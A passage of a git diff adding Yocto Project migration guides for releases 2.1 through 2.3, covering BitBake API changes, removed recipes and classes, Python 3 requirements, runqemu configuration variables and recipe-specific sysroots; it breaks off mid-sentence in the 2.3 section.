+
+Overrides Must Now be Lower-Case
+--------------------------------
+
+The convention for overrides has always been for them to be lower-case
+characters. This practice is now a requirement as BitBake's datastore
+now assumes lower-case characters in order to give a slight performance
+boost during parsing. In practical terms, this requirement means that
+anything that ends up in :term:`OVERRIDES` must now
+appear in lower-case characters (e.g. values for ``MACHINE``,
+``TARGET_ARCH``, ``DISTRO``, and also recipe names if
+``_pn-``\ recipename overrides are to be effective).
+
+.. _migration-2.1-expand-parameter-to-getvar-and-getvarflag-now-mandatory:
+
+Expand Parameter to ``getVar()`` and ``getVarFlag()`` is Now Mandatory
+----------------------------------------------------------------------
+
+The expand parameter to ``getVar()`` and ``getVarFlag()`` previously
+defaulted to False if not specified. Now, however, no default exists so
+one must be specified. You must change any ``getVar()`` calls that do
+not specify the final expand parameter to calls that do specify the
+parameter. You can run the following ``sed`` command at the base of a
+layer to make this change:
+::
+
+   sed -e 's:\(\.getVar([^,()]*\)):\1, False):g' -i `grep -ril getVar *`
+   sed -e 's:\(\.getVarFlag([^,()]*,[^,()]*\)):\1, False):g' -i `grep -ril getVarFlag *`
+
+.. note::
+
+   The reason for this change is that it prepares the way for changing
+   the default to True in a future Yocto Project release. This future
+   change is a much more sensible default than False. However, the
+   change needs to be made gradually as a sudden change of the default
+   would potentially cause side-effects that would be difficult to
+   detect.
+
+.. _migration-2.1-makefile-environment-changes:
+
+Makefile Environment Changes
+----------------------------
+
+:term:`EXTRA_OEMAKE` now defaults to "" instead of
+"-e MAKEFLAGS=". Setting ``EXTRA_OEMAKE`` to "-e MAKEFLAGS=" by default
+was a historical accident that has required many classes (e.g.
+``autotools``, ``module``) and recipes to override this default in order
+to work with sensible build systems. When upgrading to the release, you
+must edit any recipe that relies upon this old default by either setting
+``EXTRA_OEMAKE`` back to "-e MAKEFLAGS=" or by explicitly setting any
+required variable value overrides using ``EXTRA_OEMAKE``, which is
+typically only needed when a Makefile sets a default value for a
+variable that is inappropriate for cross-compilation using the "="
+operator rather than the "?=" operator.
+
+.. _migration-2.1-libexecdir-reverted-to-prefix-libexec:
+
+``libexecdir`` Reverted to ``${prefix}/libexec``
+------------------------------------------------
+
+The use of ``${libdir}/${BPN}`` as ``libexecdir`` is different as
+compared to all other mainstream distributions, which either uses
+``${prefix}/libexec`` or ``${libdir}``. The use is also contrary to the
+GNU Coding Standards (i.e.
+https://www.gnu.org/prep/standards/html_node/Directory-Variables.html)
+that suggest ``${prefix}/libexec`` and also notes that any
+package-specific nesting should be done by the package itself. Finally,
+having ``libexecdir`` change between recipes makes it very difficult for
+different recipes to invoke binaries that have been installed into
+``libexecdir``. The Filesystem Hierarchy Standard (i.e.
+http://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch04s07.html) now
+recognizes the use of ``${prefix}/libexec/``, giving distributions the
+choice between ``${prefix}/lib`` or ``${prefix}/libexec`` without
+breaking FHS.
+
+.. _migration-2.1-ac-cv-sizeof-off-t-no-longer-cached-in-site-files:
+
+``ac_cv_sizeof_off_t`` is No Longer Cached in Site Files
+--------------------------------------------------------
+
+For recipes inheriting the :ref:`autotools <ref-classes-autotools>`
+class, ``ac_cv_sizeof_off_t`` is no longer cached in the site files for
+``autoconf``. The reason for this change is because the
+``ac_cv_sizeof_off_t`` value is not necessarily static per architecture
+as was previously assumed. Rather, the value changes based on whether
+large file support is enabled. For most software that uses ``autoconf``,
+this change should not be a problem. However, if you have a recipe that
+bypasses the standard :ref:`ref-tasks-configure` task
+from the ``autotools`` class and the software the recipe is building
+uses a very old version of ``autoconf``, the recipe might be incapable
+of determining the correct size of ``off_t`` during ``do_configure``.
+
+The best course of action is to patch the software as necessary to allow
+the default implementation from the ``autotools`` class to work such
+that ``autoreconf`` succeeds and produces a working configure script,
+and to remove the overridden ``do_configure`` task such that the default
+implementation does get used.
+
+.. _migration-2.1-image-generation-split-out-from-filesystem-generation:
+
+Image Generation is Now Split Out from Filesystem Generation
+------------------------------------------------------------
+
+Previously, for image recipes the :ref:`ref-tasks-rootfs`
+task assembled the filesystem and then from that filesystem generated
+images. With this Yocto Project release, image generation is split into
+separate :ref:`ref-tasks-image` tasks for clarity both in
+operation and in the code.
+
+For most cases, this change does not present any problems. However, if
+you have made customizations that directly modify the ``do_rootfs`` task
+or that mention ``do_rootfs``, you might need to update those changes.
+In particular, if you had added any tasks after ``do_rootfs``, you
+should make edits so that those tasks are after the
+:ref:`ref-tasks-image-complete` task rather than
+after ``do_rootfs`` so that the your added tasks run at the correct
+time.
+
+A minor part of this restructuring is that the post-processing
+definitions and functions have been moved from the
+:ref:`image <ref-classes-image>` class to the
+:ref:`rootfs-postcommands <ref-classes-rootfs*>` class. Functionally,
+however, they remain unchanged.
+
+.. _migration-2.1-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed in the 2.1 release:
+
+-  ``gcc`` version 4.8: Versions 4.9 and 5.3 remain.
+
+-  ``qt4``: All support for Qt 4.x has been moved out to a separate
+   ``meta-qt4`` layer because Qt 4 is no longer supported upstream.
+
+-  ``x11vnc``: Moved to the ``meta-oe`` layer.
+
+-  ``linux-yocto-3.14``: No longer supported.
+
+-  ``linux-yocto-3.19``: No longer supported.
+
+-  ``libjpeg``: Replaced by the ``libjpeg-turbo`` recipe.
+
+-  ``pth``: Became obsolete.
+
+-  ``liboil``: Recipe is no longer needed and has been moved to the
+   ``meta-multimedia`` layer.
+
+-  ``gtk-theme-torturer``: Recipe is no longer needed and has been moved
+   to the ``meta-gnome`` layer.
+
+-  ``gnome-mime-data``: Recipe is no longer needed and has been moved to
+   the ``meta-gnome`` layer.
+
+-  ``udev``: Replaced by the ``eudev`` recipe for compatibility when
+   using ``sysvinit`` with newer kernels.
+
+-  ``python-pygtk``: Recipe became obsolete.
+
+-  ``adt-installer``: Recipe became obsolete. See the "`ADT
+   Removed <#adt-removed>`__" section for more
+   information.
+
+.. _migration-2.1-class-changes:
+
+Class Changes
+-------------
+
+The following classes have changed:
+
+-  ``autotools_stage``: Removed because the
+   :ref:`autotools <ref-classes-autotools>` class now provides its
+   functionality. Recipes that inherited from ``autotools_stage`` should
+   now inherit from ``autotools`` instead.
+
+-  ``boot-directdisk``: Merged into the ``image-vm`` class. The
+   ``boot-directdisk`` class was rarely directly used. Consequently,
+   this change should not cause any issues.
+
+-  ``bootimg``: Merged into the
+   :ref:`image-live <ref-classes-image-live>` class. The ``bootimg``
+   class was rarely directly used. Consequently, this change should not
+   cause any issues.
+
+-  ``packageinfo``: Removed due to its limited use by the Hob UI, which
+   has itself been removed.
+
+.. _migration-2.1-build-system-ui-changes:
+
+Build System User Interface Changes
+-----------------------------------
+
+The following changes have been made to the build system user interface:
+
+-  *Hob GTK+-based UI*: Removed because it is unmaintained and based on
+   the outdated GTK+ 2 library. The Toaster web-based UI is much more
+   capable and is actively maintained. See the
+   ":ref:`toaster-manual/toaster-manual-setup-and-use:using the toaster web interface`"
+   section in the Toaster User Manual for more information on this
+   interface.
+
+-  *"puccho" BitBake UI*: Removed because is unmaintained and no longer
+   useful.
+
+.. _migration-2.1-adt-removed:
+
+ADT Removed
+-----------
+
+The Application Development Toolkit (ADT) has been removed because its
+functionality almost completely overlapped with the :ref:`standard
+SDK <sdk-manual/sdk-using:using the standard sdk>` and the
+:ref:`extensible SDK <sdk-manual/sdk-extensible:using the extensible sdk>`. For
+information on these SDKs and how to build and use them, see the
+:doc:`../sdk-manual/sdk-manual` manual.
+
+.. note::
+
+   The Yocto Project Eclipse IDE Plug-in is still supported and is not
+   affected by this change.
+
+.. _migration-2.1-poky-reference-distribution-changes:
+
+Poky Reference Distribution Changes
+-----------------------------------
+
+The following changes have been made for the Poky distribution:
+
+-  The ``meta-yocto`` layer has been renamed to ``meta-poky`` to better
+   match its purpose, which is to provide the Poky reference
+   distribution. The ``meta-yocto-bsp`` layer retains its original name
+   since it provides reference machines for the Yocto Project and it is
+   otherwise unrelated to Poky. References to ``meta-yocto`` in your
+   ``conf/bblayers.conf`` should automatically be updated, so you should
+   not need to change anything unless you are relying on this naming
+   elsewhere.
+
+-  The :ref:`uninative <ref-classes-uninative>` class is now enabled
+   by default in Poky. This class attempts to isolate the build system
+   from the host distribution's C library and makes re-use of native
+   shared state artifacts across different host distributions practical.
+   With this class enabled, a tarball containing a pre-built C library
+   is downloaded at the start of the build.
+
+   The ``uninative`` class is enabled through the
+   ``meta/conf/distro/include/yocto-uninative.inc`` file, which for
+   those not using the Poky distribution, can include to easily enable
+   the same functionality.
+
+   Alternatively, if you wish to build your own ``uninative`` tarball,
+   you can do so by building the ``uninative-tarball`` recipe, making it
+   available to your build machines (e.g. over HTTP/HTTPS) and setting a
+   similar configuration as the one set by ``yocto-uninative.inc``.
+
+-  Static library generation, for most cases, is now disabled by default
+   in the Poky distribution. Disabling this generation saves some build
+   time as well as the size used for build output artifacts.
+
+   Disabling this library generation is accomplished through a
+   ``meta/conf/distro/include/no-static-libs.inc``, which for those not
+   using the Poky distribution can easily include to enable the same
+   functionality.
+
+   Any recipe that needs to opt-out of having the "--disable-static"
+   option specified on the configure command line either because it is
+   not a supported option for the configure script or because static
+   libraries are needed should set the following variable:
+   ::
+
+      DISABLE_STATIC = ""
+
+-  The separate ``poky-tiny`` distribution now uses the musl C library
+   instead of a heavily pared down ``glibc``. Using musl results in a
+   smaller distribution and facilitates much greater maintainability
+   because musl is designed to have a small footprint.
+
+   If you have used ``poky-tiny`` and have customized the ``glibc``
+   configuration you will need to redo those customizations with musl
+   when upgrading to the new release.
+
+.. _migration-2.1-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following changes have been made to packaging:
+
+-  The ``runuser`` and ``mountpoint`` binaries, which were previously in
+   the main ``util-linux`` package, have been split out into the
+   ``util-linux-runuser`` and ``util-linux-mountpoint`` packages,
+   respectively.
+
+-  The ``python-elementtree`` package has been merged into the
+   ``python-xml`` package.
+
+.. _migration-2.1-tuning-file-changes:
+
+Tuning File Changes
+-------------------
+
+The following changes have been made to the tuning files:
+
+-  The "no-thumb-interwork" tuning feature has been dropped from the ARM
+   tune include files. Because interworking is required for ARM EABI,
+   attempting to disable it through a tuning feature no longer makes
+   sense.
+
+   .. note::
+
+      Support for ARM OABI was deprecated in gcc 4.7.
+
+-  The ``tune-cortexm*.inc`` and ``tune-cortexr4.inc`` files have been
+   removed because they are poorly tested. Until the OpenEmbedded build
+   system officially gains support for CPUs without an MMU, these tuning
+   files would probably be better maintained in a separate layer if
+   needed.
+
+.. _migration-2.1-supporting-gobject-introspection:
+
+Supporting GObject Introspection
+--------------------------------
+
+This release supports generation of GLib Introspective Repository (GIR)
+files through GObject introspection, which is the standard mechanism for
+accessing GObject-based software from runtime environments. You can
+enable, disable, and test the generation of this data. See the
+":ref:`dev-manual/dev-manual-common-tasks:enabling gobject introspection support`"
+section in the Yocto Project Development Tasks Manual for more
+information.
+
+.. _migration-2.1-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+These additional changes exist:
+
+-  The minimum Git version has been increased to 1.8.3.1. If your host
+   distribution does not provide a sufficiently recent version, you can
+   install the buildtools, which will provide it. See the
+   :ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`
+   section for more information on the buildtools tarball.
+
+-  The buggy and incomplete support for the RPM version 4 package
+   manager has been removed. The well-tested and maintained support for
+   RPM version 5 remains.
+
+-  Previously, the following list of packages were removed if
+   package-management was not in
+   :term:`IMAGE_FEATURES`, regardless of any
+   dependencies:
+   ::
+
+      update-rc.d
+      base-passwd
+      shadow
+      update-alternatives
+      run-postinsts
+
+   With the Yocto Project 2.1 release, these packages are
+   only removed if "read-only-rootfs" is in ``IMAGE_FEATURES``, since
+   they might still be needed for a read-write image even in the absence
+   of a package manager (e.g. if users need to be added, modified, or
+   removed at runtime).
+
+-  The
+   :ref:`devtool modify <sdk-manual/sdk-extensible:use \`\`devtool modify\`\` to modify the source of an existing component>`
+   command now defaults to extracting the source since that is most
+   commonly expected. The "-x" or "--extract" options are now no-ops. If
+   you wish to provide your own existing source tree, you will now need
+   to specify either the "-n" or "--no-extract" options when running
+   ``devtool modify``.
+
+-  If the formfactor for a machine is either not supplied or does not
+   specify whether a keyboard is attached, then the default is to assume
+   a keyboard is attached rather than assume no keyboard. This change
+   primarily affects the Sato UI.
+
+-  The ``.debug`` directory packaging is now automatic. If your recipe
+   builds software that installs binaries into directories other than
+   the standard ones, you no longer need to take care of setting
+   ``FILES_${PN}-dbg`` to pick up the resulting ``.debug`` directories
+   as these directories are automatically found and added.
+
+-  Inaccurate disk and CPU percentage data has been dropped from
+   ``buildstats`` output. This data has been replaced with
+   ``getrusage()`` data and corrected IO statistics. You will probably
+   need to update any custom code that reads the ``buildstats`` data.
+
+-  The ``meta/conf/distro/include/package_regex.inc`` is now deprecated.
+   The contents of this file have been moved to individual recipes.
+
+   .. note::
+
+      Because this file will likely be removed in a future Yocto Project
+      release, it is suggested that you remove any references to the
+      file that might be in your configuration.
+
+-  The ``v86d/uvesafb`` has been removed from the ``genericx86`` and
+   ``genericx86-64`` reference machines, which are provided by the
+   ``meta-yocto-bsp`` layer. Most modern x86 boards do not rely on this
+   file and it only adds kernel error messages during startup. If you do
+   still need to support ``uvesafb``, you can simply add ``v86d`` to
+   your image.
+
+-  Build sysroot paths are now removed from debug symbol files. Removing
+   these paths means that remote GDB using an unstripped build system
+   sysroot will no longer work (although this was never documented to
+   work). The supported method to accomplish something similar is to set
+   ``IMAGE_GEN_DEBUGFS`` to "1", which will generate a companion debug
+   image containing unstripped binaries and associated debug sources
+   alongside the image.
+
+
diff --git a/documentation/ref-manual/migration-2.2.rst b/documentation/ref-manual/migration-2.2.rst
new file mode 100644
index 0000000000..8afa8ffdda
--- /dev/null
+++ b/documentation/ref-manual/migration-2.2.rst
@@ -0,0 +1,450 @@
+Moving to the Yocto Project 2.2 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.2 Release from the prior release.
+
+.. _migration-2.2-minimum-kernel-version:
+
+Minimum Kernel Version
+----------------------
+
+The minimum kernel version for the target system and for SDK is now
+3.2.0, due to the upgrade to ``glibc 2.24``. Specifically, for
+AArch64-based targets the version is 3.14. For Nios II-based targets,
+the minimum kernel version is 3.19.
+
+.. note::
+
+   For x86 and x86_64, you can reset :term:`OLDEST_KERNEL`
+   to anything down to 2.6.32 if desired.
+
+.. _migration-2.2-staging-directories-in-sysroot-simplified:
+
+Staging Directories in Sysroot Has Been Simplified
+--------------------------------------------------
+
+The way directories are staged in sysroot has been simplified and
+introduces the new :term:`SYSROOT_DIRS`,
+:term:`SYSROOT_DIRS_NATIVE`, and
+:term:`SYSROOT_DIRS_BLACKLIST`. See the
+`v2 patch series on the OE-Core Mailing
+List <http://lists.openembedded.org/pipermail/openembedded-core/2016-May/121365.html>`__
+for additional information.
+
+.. _migration-2.2-removal-of-old-images-from-tmp-deploy-now-enabled:
+
+Removal of Old Images and Other Files in ``tmp/deploy`` Now Enabled
+-------------------------------------------------------------------
+
+Removal of old images and other files in ``tmp/deploy/`` is now enabled
+by default due to a new staging method used for those files. As a result
+of this change, the ``RM_OLD_IMAGE`` variable is now redundant.
+
+.. _migration-2.2-python-changes:
+
+Python Changes
+--------------
+
+The following changes for Python occurred:
+
+.. _migration-2.2-bitbake-now-requires-python-3.4:
+
+BitBake Now Requires Python 3.4+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake requires Python 3.4 or greater.
+
+.. _migration-2.2-utf-8-locale-required-on-build-host:
+
+UTF-8 Locale Required on Build Host
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+A UTF-8 locale is required on the build host due to Python 3. Since
+C.UTF-8 is not a standard, the default is en_US.UTF-8.
+
+.. _migration-2.2-metadata-now-must-use-python-3-syntax:
+
+Metadata Must Now Use Python 3 Syntax
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The metadata is now required to use Python 3 syntax. For help preparing
+metadata, see any of the many Python 3 porting guides available.
+Alternatively, you can reference the conversion commits for Bitbake and
+you can use :term:`OpenEmbedded-Core (OE-Core)` as a guide for changes. Following are
+particular areas of interest:
+
+  - subprocess command-line pipes needing locale decoding
+
+  - the syntax for octal values changed
+
+  - the ``iter*()`` functions changed name
+
+  - iterators now return views, not lists
+
+  - changed names for Python modules
+
+.. _migration-2.2-target-python-recipes-switched-to-python-3:
+
+Target Python Recipes Switched to Python 3
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Most target Python recipes have now been switched to Python 3.
+Unfortunately, systems using RPM as a package manager and providing
+online package-manager support through SMART still require Python 2.
+
+.. note::
+
+   Python 2 and recipes that use it can still be built for the target as
+   with previous versions.
+
+.. _migration-2.2-buildtools-tarball-includes-python-3:
+
+``buildtools-tarball`` Includes Python 3
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``buildtools-tarball`` now includes Python 3.
+
+.. _migration-2.2-uclibc-replaced-by-musl:
+
+uClibc Replaced by musl
+-----------------------
+
+uClibc has been removed in favor of musl. Musl has matured, is better
+maintained, and is compatible with a wider range of applications as
+compared to uClibc.
+
+.. _migration-2.2-B-no-longer-default-working-directory-for-tasks:
+
+``${B}`` No Longer Default Working Directory for Tasks
+------------------------------------------------------
+
+``${``\ :term:`B`\ ``}`` is no longer the default working
+directory for tasks. Consequently, any custom tasks you define now need
+to either have the
+``[``\ :ref:`dirs <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]`` flag
+set, or the task needs to change into the appropriate working directory
+manually (e.g using ``cd`` for a shell task).
+
+.. note::
+
+   The preferred method is to use the
+   [dirs]
+   flag.
+
+.. _migration-2.2-runqemu-ported-to-python:
+
+``runqemu`` Ported to Python
+----------------------------
+
+``runqemu`` has been ported to Python and has changed behavior in some
+cases. Previous usage patterns continue to be supported.
+
+The new ``runqemu`` is a Python script. Machine knowledge is no longer
+hardcoded into ``runqemu``. You can choose to use the ``qemuboot``
+configuration file to define the BSP's own arguments and to make it
+bootable with ``runqemu``. If you use a configuration file, use the
+following form:
+::
+
+   image-name-machine.qemuboot.conf
+
+The configuration file
+enables fine-grained tuning of options passed to QEMU without the
+``runqemu`` script hard-coding any knowledge about different machines.
+Using a configuration file is particularly convenient when trying to use
+QEMU with machines other than the ``qemu*`` machines in
+:term:`OpenEmbedded-Core (OE-Core)`. The ``qemuboot.conf`` file is generated by the
+``qemuboot`` class when the root filesystem is being build (i.e. build
+rootfs). QEMU boot arguments can be set in BSP's configuration file and
+the ``qemuboot`` class will save them to ``qemuboot.conf``.
+
+If you want to use ``runqemu`` without a configuration file, use the
+following command form:
+::
+
+   $ runqemu machine rootfs kernel [options]
+
+Supported machines are as follows:
+
+  - qemuarm
+  - qemuarm64
+  - qemux86
+  - qemux86-64
+  - qemuppc
+  - qemumips
+  - qemumips64
+  - qemumipsel
+  - qemumips64el
+
+Consider the
+following example, which uses the ``qemux86-64`` machine, provides a
+root filesystem, provides an image, and uses the ``nographic`` option: ::
+
+   $ runqemu qemux86-64 tmp/deploy/images/qemux86-64/core-image-minimal-qemux86-64.ext4 tmp/deploy/images/qemux86-64/bzImage nographic
+
+Following is a list of variables that can be set in configuration files
+such as ``bsp.conf`` to enable the BSP to be booted by ``runqemu``:
+
+.. note::
+
+   "QB" means "QEMU Boot".
+
+::
+
+   QB_SYSTEM_NAME: QEMU name (e.g. "qemu-system-i386")
+   QB_OPT_APPEND: Options to append to QEMU (e.g. "-show-cursor")
+   QB_DEFAULT_KERNEL: Default kernel to boot (e.g. "bzImage")
+   QB_DEFAULT_FSTYPE: Default FSTYPE to boot (e.g. "ext4")
+   QB_MEM: Memory (e.g. "-m 512")
+   QB_MACHINE: QEMU machine (e.g. "-machine virt")
+   QB_CPU: QEMU cpu (e.g. "-cpu qemu32")
+   QB_CPU_KVM: Similar to QB_CPU except used for kvm support (e.g. "-cpu kvm64")
+   QB_KERNEL_CMDLINE_APPEND: Options to append to the kernel's -append
+                             option (e.g. "console=ttyS0 console=tty")
+   QB_DTB: QEMU dtb name
+   QB_AUDIO_DRV: QEMU audio driver (e.g. "alsa", set it when support audio)
+   QB_AUDIO_OPT: QEMU audio option (e.g. "-soundhw ac97,es1370"), which is used
+                 when QB_AUDIO_DRV is set.
+   QB_KERNEL_ROOT: Kernel's root (e.g. /dev/vda)
+   QB_TAP_OPT: Network option for 'tap' mode (e.g.
+               "-netdev tap,id=net0,ifname=@TAP@,script=no,downscript=no -device virtio-net-device,netdev=net0").
+                runqemu will replace "@TAP@" with the one that is used, such as tap0, tap1 ...
+   QB_SLIRP_OPT: Network option for SLIRP mode (e.g. "-netdev user,id=net0 -device virtio-net-device,netdev=net0")
+   QB_ROOTFS_OPT: Used as rootfs (e.g.
+                  "-drive id=disk0,file=@ROOTFS@,if=none,format=raw -device virtio-blk-device,drive=disk0").
+                  runqemu will replace "@ROOTFS@" with the one which is used, such as
+                  core-image-minimal-qemuarm64.ext4.
+   QB_SERIAL_OPT: Serial port (e.g. "-serial mon:stdio")
+   QB_TCPSERIAL_OPT: tcp serial port option (e.g.
+                     " -device virtio-serial-device -chardev socket,id=virtcon,port=@PORT@,host=127.0.0.1 -device      virtconsole,chardev=virtcon"
+                     runqemu will replace "@PORT@" with the port number which is used.
+
+To use ``runqemu``, set :term:`IMAGE_CLASSES` as
+follows and run ``runqemu``:
+
+.. note::
+
+   For command-line syntax, use ``runqemu help``.
+
+::
+
+   IMAGE_CLASSES += "qemuboot"
+
+.. _migration-2.2-default-linker-hash-style-changed:
+
+Default Linker Hash Style Changed
+---------------------------------
+
+The default linker hash style for ``gcc-cross`` is now "sysv" in order
+to catch recipes that are building software without using the
+OpenEmbedded :term:`LDFLAGS`. This change could result in
+seeing some "No GNU_HASH in the elf binary" QA issues when building such
+recipes. You need to fix these recipes so that they use the expected
+``LDFLAGS``. Depending on how the software is built, the build system
+used by the software (e.g. a Makefile) might need to be patched.
+However, sometimes making this fix is as simple as adding the following
+to the recipe:
+::
+
+   TARGET_CC_ARCH += "${LDFLAGS}"
+
+.. _migration-2.2-kernel-image-base-name-no-longer-uses-kernel-imagetype:
+
+``KERNEL_IMAGE_BASE_NAME`` no Longer Uses ``KERNEL_IMAGETYPE``
+--------------------------------------------------------------
+
+The ``KERNEL_IMAGE_BASE_NAME`` variable no longer uses the
+:term:`KERNEL_IMAGETYPE` variable to create the
+image's base name. Because the OpenEmbedded build system can now build
+multiple kernel image types, this part of the kernel image base name as
+been removed leaving only the following:
+::
+
+   KERNEL_IMAGE_BASE_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}-${DATETIME}"
+
+If you have recipes or
+classes that use ``KERNEL_IMAGE_BASE_NAME`` directly, you might need to
+update the references to ensure they continue to work.
+
+.. _migration-2.2-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes took place for BitBake:
+
+-  The "goggle" UI and standalone image-writer tool have been removed as
+   they both require GTK+ 2.0 and were not being maintained.
+
+-  The Perforce fetcher now supports :term:`SRCREV` for
+   specifying the source revision to use, be it
+   ``${``\ :term:`AUTOREV`\ ``}``, changelist number,
+   p4date, or label, in preference to separate
+   :term:`SRC_URI` parameters to specify these. This
+   change is more in-line with how the other fetchers work for source
+   control systems. Recipes that fetch from Perforce will need to be
+   updated to use ``SRCREV`` in place of specifying the source revision
+   within ``SRC_URI``.
+
+-  Some of BitBake's internal code structures for accessing the recipe
+   cache needed to be changed to support the new multi-configuration
+   functionality. These changes will affect external tools that use
+   BitBake's tinfoil module. For information on these changes, see the
+   changes made to the scripts supplied with OpenEmbedded-Core:
+   `1 <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=189371f8393971d00bca0fceffd67cc07784f6ee>`__
+   and
+   `2 <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=4a5aa7ea4d07c2c90a1654b174873abb018acc67>`__.
+
+-  The task management code has been rewritten to avoid using ID
+   indirection in order to improve performance. This change is unlikely
+   to cause any problems for most users. However, the setscene
+   verification function as pointed to by
+   ``BB_SETSCENE_VERIFY_FUNCTION`` needed to change signature.
+   Consequently, a new variable named ``BB_SETSCENE_VERIFY_FUNCTION2``
+   has been added allowing multiple versions of BitBake to work with
+   suitably written metadata, which includes OpenEmbedded-Core and Poky.
+   Anyone with custom BitBake task scheduler code might also need to
+   update the code to handle the new structure.
+
+.. _migration-2.2-swabber-has-been-removed:
+
+Swabber has Been Removed
+------------------------
+
+Swabber, a tool that was intended to detect host contamination in the
+build process, has been removed, as it has been unmaintained and unused
+for some time and was never particularly effective. The OpenEmbedded
+build system has since incorporated a number of mechanisms including
+enhanced QA checks that mean that there is less of a need for such a
+tool.
+
+.. _migration-2.2-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``augeas``: No longer needed and has been moved to ``meta-oe``.
+
+-  ``directfb``: Unmaintained and has been moved to ``meta-oe``.
+
+-  ``gcc``: Removed 4.9 version. Versions 5.4 and 6.2 are still present.
+
+-  ``gnome-doc-utils``: No longer needed.
+
+-  ``gtk-doc-stub``: Replaced by ``gtk-doc``.
+
+-  ``gtk-engines``: No longer needed and has been moved to
+   ``meta-gnome``.
+
+-  ``gtk-sato-engine``: Became obsolete.
+
+-  ``libglade``: No longer needed and has been moved to ``meta-oe``.
+
+-  ``libmad``: Unmaintained and functionally replaced by ``libmpg123``.
+   ``libmad`` has been moved to ``meta-oe``.
+
+-  ``libowl``: Became obsolete.
+
+-  ``libxsettings-client``: No longer needed.
+
+-  ``oh-puzzles``: Functionally replaced by ``puzzles``.
+
+-  ``oprofileui``: Became obsolete. OProfile has been largely supplanted
+   by perf.
+
+-  ``packagegroup-core-directfb.bb``: Removed.
+
+-  ``core-image-directfb.bb``: Removed.
+
+-  ``pointercal``: No longer needed and has been moved to ``meta-oe``.
+
+-  ``python-imaging``: No longer needed and moved to ``meta-python``
+
+-  ``python-pyrex``: No longer needed and moved to ``meta-python``.
+
+-  ``sato-icon-theme``: Became obsolete.
+
+-  ``swabber-native``: Swabber has been removed. See the `entry on
+   Swabber <#swabber-has-been-removed>`__.
+
+-  ``tslib``: No longer needed and has been moved to ``meta-oe``.
+
+-  ``uclibc``: Removed in favor of musl.
+
+-  ``xtscal``: No longer needed and moved to ``meta-oe``
+
+.. _migration-2.2-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have been removed:
+
+-  ``distutils-native-base``: No longer needed.
+
+-  ``distutils3-native-base``: No longer needed.
+
+-  ``sdl``: Only set :term:`DEPENDS` and
+   :term:`SECTION`, which are better set within the
+   recipe instead.
+
+-  ``sip``: Mostly unused.
+
+-  ``swabber``: See the `entry on
+   Swabber <#swabber-has-been-removed>`__.
+
+.. _migration-2.2-minor-packaging-changes:
+
+Minor Packaging Changes
+-----------------------
+
+The following minor packaging changes have occurred:
+
+-  ``grub``: Split ``grub-editenv`` into its own package.
+
+-  ``systemd``: Split container and vm related units into a new package,
+   systemd-container.
+
+-  ``util-linux``: Moved ``prlimit`` to a separate
+   ``util-linux-prlimit`` package.
+
+.. _migration-2.2-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+-  ``package_regex.inc``: Removed because the definitions
+   ``package_regex.inc`` previously contained have been moved to their
+   respective recipes.
+
+-  Both ``devtool add`` and ``recipetool create`` now use a fixed
+   :term:`SRCREV` by default when fetching from a Git
+   repository. You can override this in either case to use
+   ``${``\ :term:`AUTOREV`\ ``}`` instead by using the
+   ``-a`` or ``DASHDASHautorev`` command-line option
+
+-  ``distcc``: GTK+ UI is now disabled by default.
+
+-  ``packagegroup-core-tools-testapps``: Removed Piglit.
+
+-  ``image.bbclass``: Renamed COMPRESS(ION) to CONVERSION. This change
+   means that ``COMPRESSIONTYPES``, ``COMPRESS_DEPENDS`` and
+   ``COMPRESS_CMD`` are deprecated in favor of ``CONVERSIONTYPES``,
+   ``CONVERSION_DEPENDS`` and ``CONVERSION_CMD``. The ``COMPRESS*``
+   variable names will still work in the 2.2 release but metadata that
+   does not need to be backwards-compatible should be changed to use the
+   new names as the ``COMPRESS*`` ones will be removed in a future
+   release.
+
+-  ``gtk-doc``: A full version of ``gtk-doc`` is now made available.
+   However, some old software might not be capable of using the current
+   version of ``gtk-doc`` to build documentation. You need to change
+   recipes that build such software so that they explicitly disable
+   building documentation with ``gtk-doc``.
+
+
diff --git a/documentation/ref-manual/migration-2.3.rst b/documentation/ref-manual/migration-2.3.rst
new file mode 100644
index 0000000000..5bf3e7033c
--- /dev/null
+++ b/documentation/ref-manual/migration-2.3.rst
@@ -0,0 +1,523 @@
+Moving to the Yocto Project 2.3 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.3 Release from the prior release.
+
+.. _migration-2.3-recipe-specific-sysroots:
+
+Recipe-specific Sysroots
+------------------------
+
+The OpenEmbedded build system now uses one sysroot per recipe to resolve
+long-standing issues with configuration script auto-detection of
+undeclared dependencies. Consequently, you might find that some of your
+previously written custom recipes are missing declared dependencies,
+particularly those dependencies that are incidentally built earlier in a
+typical build process and thus are already likely to be present in the
+shared sysroot in previous releases.
+
+Consider the following:
+
+-  *Declare Build-Time Dependencies:* Because of this new feature, you
+   must explicitly declare all build-time dependencies for your recipe.
+   If you do not declare these dependencies, they are not populated into
+   the sysroot for the recipe.
+
+-  *Specify Pre-Installation and Post-Installation Native Tool
+   Dependencies:* You must specifically specify any special native tool
+   dependencies of ``pkg_preinst`` and ``pkg_postinst`` scripts by using
+   the :term:`PACKAGE_WRITE_DEPS` variable.
+   Specifying these dependencies ensures that these tools are available
+   if these scripts need to be run on the build host during the
+   :ref:`ref-tasks-rootfs` task.
+
+   As an example, see the ``dbus`` recipe. You will see that this recipe
